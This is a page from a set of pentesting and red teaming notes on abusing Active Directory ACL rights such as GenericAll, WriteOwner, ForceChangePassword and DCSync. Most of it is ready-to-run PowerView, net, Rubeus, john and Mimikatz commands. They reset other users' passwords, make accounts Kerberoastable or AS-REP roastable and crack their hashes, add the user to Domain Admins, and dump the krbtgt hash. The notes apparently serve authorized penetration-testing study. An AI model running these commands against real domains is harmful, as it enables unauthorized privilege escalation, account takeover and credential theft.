Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Generic All on User
  • Generic All on Group
  • Generic write / Write on computer
  • WriteProperty on Group
  • Self-Membership on group
  • WriteProperty on group
  • ForceChangePassword on user
  • WriteOwner on Group
  • GenericWrite on Group
  • DCsync
  1. Active Directory Pentesting

ACLs Abuse

Generic All on User

If we have generic all right over a user object we can...

  1. Change that user's password. net user <username> <password> /domain

  2. Setup Targeted Kerberoasting by making that user kerberoastable by setting SPN on the account, kerberoasting it and cracking it offline

  • First Set SPN on that user object

Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}

  • Then Get Hash and crack

Rubeus.exe kerberoast /outfile:targetedhashes.txt 
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

  1. Setup Targeted Asreproasting by disabling pre authentication on that user asreproasting it and cracking it offline

Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}

Generic All on Group

If we have generic all rights on a group example Domain Admins we can...

  1. Add ourselves to that group

net group "Domain Admins" myuser /add /domain

Generic write / Write on computer

If we have generic write or write property on a domain computer we can setup Resource Based Constrained Delegation and access the computer object. See Resource-Based-Constrained-Delegation.md section.

WriteProperty on Group

If our controlled user has WriteProperty right on All objects for Domain Admin group, We can again add ourselves to the Domain Admins group and escalate privileges:

Add-NetGroupUser -UserName myuser -GroupName "Domain Admins" -Domain "offense.local"

Self-Membership on group

If our user has Self-Membership property on a group we can add ourselves to that group

Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"

WriteProperty on group

If our user has WriteProperty property on a group we can add ourselves to that group

net group "domain admins" spotless /add /domain

ForceChangePassword on user

If we have ExtendedRight on User-Force-Change-Password object type, we can reset the user's password without knowing their current password:

  • Using PowerView

Set-DomainUserPassword -Identity targetuser -Verbose

  • Another method

$c = Get-Credential
Set-DomainUserPassword -Identity targetuser -AccountPassword $c.Password -Verbose

WriteOwner on Group

IF user in our control has WriteOwner on a group we can change the group's owner to our user, below the sid is the sid of domain admins group

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "ouruser" -Verbose

GenericWrite on Group

This allows us to set new users (yourself for example) as members of the group

# Create creds
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd) 
# Add user to group
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
# Check user was added
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
# Remove group member
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose

DCsync

IF we have dcsync rights we can use mimikatz to dump all hashes of user and computer objects

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
PreviousACLs DescriptionsNextACL

Last updated 1 year ago